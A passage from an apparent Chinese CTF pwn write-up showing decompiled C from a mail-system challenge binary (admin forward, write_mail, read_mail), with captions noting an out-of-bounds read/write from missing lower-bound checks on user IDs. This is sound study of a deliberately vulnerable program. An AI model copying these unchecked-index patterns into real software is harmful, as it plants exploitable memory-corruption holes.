class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">)</span><span class="nf">__isoc99_scanf</span><span class="p">(</span><span class="s">&#34;%d&#34;</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">v2</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">1</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;Invalid destination user ID!&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">while</span> <span class="p">(</span> <span class="nf">getchar</span><span class="p">()</span> <span class="o">!=</span> <span class="mi">10</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">goto</span> <span class="n">ret</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v1</span> <span class="o">&gt;</span> <span class="mi">12</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;Source user ID out of range!&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">putchar</span><span class="p">(</span><span class="mi">10</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span> <span class="n">user_table</span><span class="p">[</span><span class="n">v1</span> <span class="o">-</span> <span class="mi">1</span><span class="p">]</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v2</span> <span class="o">&gt;</span> <span class="mi">12</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;Destination user ID out of range!&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">putchar</span><span class="p">(</span><span class="mi">10</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span> <span class="n">user_table</span><span class="p">[</span><span class="n">v2</span> <span class="o">-</span> <span class="mi">1</span><span class="p">]</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">!*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)(</span><span class="n">user_table</span><span class="p">[</span><span class="n">v2</span> <span class="o">-</span> <span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="mh">0x308LL</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="o">||</span> <span class="p">(</span><span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Warning: User %d already has unread mail. Overwrite? (y/n): &#34;</span><span class="p">,</span> <span class="n">v2</span><span class="p">),</span> </span></span><span class="line"><span class="cl"> <span class="nf">__isoc99_scanf</span><span class="p">(</span><span class="s">&#34; %c&#34;</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">v3</span><span class="p">),</span> </span></span><span class="line"><span class="cl"> <span class="p">(</span><span class="n">_BYTE</span><span class="p">)</span><span class="n">v3</span> <span class="o">==</span> <span class="mh">0x79</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="o">||</span> <span class="p">(</span><span class="n">_BYTE</span><span class="p">)</span><span class="n">v3</span> <span class="o">==</span> <span class="mh">0x59</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v1</span> <span class="o">&gt;</span> <span class="mi">12</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"><span class="nl">ret</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="nf">putchar</span><span class="p">(</span><span class="mi">10</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">v8</span> <span class="o">-</span> <span class="nf">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;Which mail would you like to forward?&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;1. User&#39;s draft&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;2. User&#39;s inbox mail&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Your choice: &#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">)</span><span class="nf">__isoc99_scanf</span><span class="p">(</span><span class="s">&#34;%d&#34;</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">v3</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">1</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;Invalid input!&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">while</span> <span class="p">(</span> <span class="nf">getchar</span><span class="p">()</span> <span class="o">!=</span> <span class="mi">10</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">goto</span> <span class="n">ret</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v2</span> <span class="o">&lt;=</span> <span class="mi">12</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)(</span><span class="n">user_table</span><span class="p">[</span><span class="n">v2</span> <span class="o">-</span> <span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="mh">0x308LL</span><span class="p">)</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v3</span> <span class="o">==</span> <span class="mi">1</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v2</span> <span class="o">&lt;=</span> <span class="mi">12</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">n</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)(</span><span class="n">user_table</span><span class="p">[</span><span class="n">v1</span> <span class="o">-</span> <span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="mh">0x100LL</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">n</span> <span class="o">&gt;</span> <span class="mh">0x100</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">n</span> <span class="o">=</span> <span class="mi">256</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">src</span> <span class="o">=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)(</span><span class="n">user_table</span><span class="p">[</span><span class="n">v1</span> <span class="o">-</span> <span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="mh">0x110LL</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">memcpy</span><span class="p">((</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">user_table</span><span class="p">[</span><span class="n">v2</span> <span class="o">-</span> <span class="mi">1</span><span class="p">],</span> <span class="n">src</span><span class="p">,</span> <span class="n">n</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)(</span><span class="n">user_table</span><span class="p">[</span><span class="n">v2</span> <span class="o">-</span> <span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="mh">0x210LL</span><span class="p">)</span> <span class="o">=</span> <span class="n">n</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v3</span> <span class="o">!=</span> <span class="mi">2</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;Invalid choice!&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">putchar</span><span class="p">(</span><span class="mi">10</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">v8</span> <span class="o">-</span> <span class="nf">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v2</span> <span class="o">&lt;=</span> <span class="mi">12</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">v5</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)(</span><span class="n">user_table</span><span class="p">[</span><span class="n">v1</span> <span class="o">-</span> <span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="mh">0x210LL</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v5</span> <span class="o">&gt;</span> <span class="mh">0x100</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">v5</span> <span class="o">=</span> <span class="mh">0x100</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v6</span> <span class="o">=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">user_table</span><span class="p">[</span><span class="n">v1</span> <span class="o">-</span> <span class="mi">1</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> <span class="nf">memcpy</span><span class="p">((</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">user_table</span><span class="p">[</span><span class="n">v2</span> <span class="o">-</span> <span class="mi">1</span><span class="p">],</span> <span class="n">v6</span><span class="p">,</span> <span class="n">v5</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)(</span><span class="n">user_table</span><span class="p">[</span><span class="n">v2</span> <span class="o">-</span> <span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="mh">0x210LL</span><span class="p">)</span> <span class="o">=</span> <span class="n">v5</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Mail forwarded from index %d to index %d!</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">v1</span><span class="p">,</span> <span class="n">v2</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;Forwarding cancelled.&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">putchar</span><span class="p">(</span><span class="mi">10</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Destination user %d does not exist!</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">v2</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">putchar</span><span class="p">(</span><span class="mi">10</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Source user %d does not exist!</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">v1</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">putchar</span><span class="p">(</span><span class="mi">10</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">v8</span> <span class="o">-</span> <span class="nf">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>管理员以某一用户名义发邮件给另一名用户,存在越界读写</p> <h4 id="mail_menu">mail_menu </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">mail_menu</span><span class="p">()</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;1. Write mail&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;2. Read mail&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;3. Send mail&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;4. Logout&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Your choice: &#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>用户菜单</p> <h4 id="write_mail">write_mail </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="kr">__fastcall</span> <span class="nf">write_mail</span><span class="p">(</span><span class="kr">__int64</span> <span class="n">a1</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">v2</span><span class="p">;</span> <span class="c1">// [rsp+18h] [rbp-118h] BYREF </span></span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">v3</span><span class="p">;</span> <span class="c1">// [rsp+1Ch] [rbp-114h] </span></span></span><span class="line"><span class="cl"> <span class="n">_BYTE</span> <span class="n">buf</span><span class="p">[</span><span class="mi">264</span><span class="p">];</span> <span class="c1">// [rsp+20h] [rbp-110h] BYREF </span></span></span><span class="line"><span class="cl"> <span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="n">v5</span><span class="p">;</span> <span class="c1">// [rsp+128h] [rbp-8h] </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">v5</span> <span class="o">=</span> <span class="nf">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;How many bytes do you want to write? (1-%d): &#34;</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">)</span><span class="nf">__isoc99_scanf</span><span class="p">(</span><span class="s">&#34;%d&#34;</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">v2</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">1</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;Invalid input!&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">while</span> <span class="p">(</span> <span class="nf">getchar</span><span class="p">()</span> <span class="o">!=</span> <span class="mi">10</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nl">LABEL_16</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="nf">putchar</span><span class="p">(</span><span class="mi">10</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">v5</span> <span class="o">-</span> <span class="nf">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v2</span> <span class="o">&gt;</span> <span class="mi">0</span> <span class="o">&amp;&amp;</span> <span class="n">v2</span> <span class="o">&lt;=</span> <span class="mi">256</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Write your mail content (max %d bytes):</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">v2</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">while</span> <span class="p">(</span> <span class="nf">getchar</span><span class="p">()</span> <span class="o">!=</span> <span class="mi">10</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v3</span> <span class="o">=</span> <span class="nf">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="n">v2</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v3</span> <span class="o">&lt;=</span> <span class="mi">0</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;Failed to read input!&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">memcpy</span><span class="p">((</span><span class="kt">void</span> <span class="o">*</span><span class="p">)(</span><span class="n">a1</span> <span class="o">+</span> <span class="mh">0x110</span><span class="p">),</span> <span class="n">buf</span><span class="p">,</span> <span class="n">v3</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)(</span><span class="n">a1</span> <span class="o">+</span> <span class="mh">0x100</span><span class="p">)</span> <span class="o">=</span> <span class="n">v3</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v3</span> <span class="o">&gt;</span> <span class="mh">0xFF</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_BYTE</span> <span class="o">*</span><span class="p">)(</span><span class="n">a1</span> <span class="o">+</span> <span class="mh">0x20F</span><span class="p">)</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_BYTE</span> <span class="o">*</span><span class="p">)(</span><span class="n">v3</span> <span class="o">+</span> <span class="mh">0x110LL</span> <span class="o">+</span> <span class="n">a1</span><span class="p">)</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)(</span><span class="n">a1</span> <span class="o">+</span> <span class="mh">0x310</span><span class="p">)</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;Draft saved!&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">goto</span> <span class="n">LABEL_16</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Write size must be between 1 and %d bytes.</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">putchar</span><span class="p">(</span><span class="mi">10</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">v5</span> <span class="o">-</span> <span class="nf">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>写邮件</p> <h4 id="read_mail">read_mail </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="kr">__fastcall</span> <span class="nf">read_mail</span><span class="p">(</span><span class="kr">__int64</span> <span class="n">a1</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">v2</span><span class="p">;</span> <span class="c1">// [rsp+14h] [rbp-Ch] </span></span></span><span class="line"><span class="cl"> <span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="n">v3</span><span class="p">;</span> <span class="c1">// [rsp+18h] [rbp-8h] </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">v3</span> <span class="o">=</span> <span class="nf">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">while</span> <span class="p">(</span> <span class="mi">1</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">while</span> <span class="p">(</span> <span class="mi">1</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">read_menu</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">)</span><span class="nf">__isoc99_scanf</span><span class="p">(</span><span class="s">&#34;%d&#34;</span><span class="p">)</span> <span class="o">==</span> <span class="mi">1</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">while</span> <span class="p">(</span> <span class="nf">getchar</span><span class="p">()</span> <span class="o">!=</span> <span class="mi">10</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;Invalid input!&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v2</span> <span class="o">==</span> <span class="mi">3</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v2</span> <span class="o">&gt;</span> <span class="mi">3</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">goto</span> <span class="n">LABEL_17</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v2</span> <span class="o">==</span> <span class="mi">1</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)(</span><span class="n">a1</span> <span class="o">+</span> <span class="mh">0x310</span><span class="p">)</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;Your saved draft:&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">((</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="p">)(</span><span class="n">a1</span> <span class="o">+</span> <span class="mh">0x110</span><span class="p">));</span> </span></span><span class="line"><span class="cl"> <span class="nf">putchar</span><span class="p">(</span><span class="mi">10</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;No saved draft found.</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span> <span class="n">v2</span> <span class="o">==</span> <span class="mi">2</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)(</span><span class="n">a1</span> <span 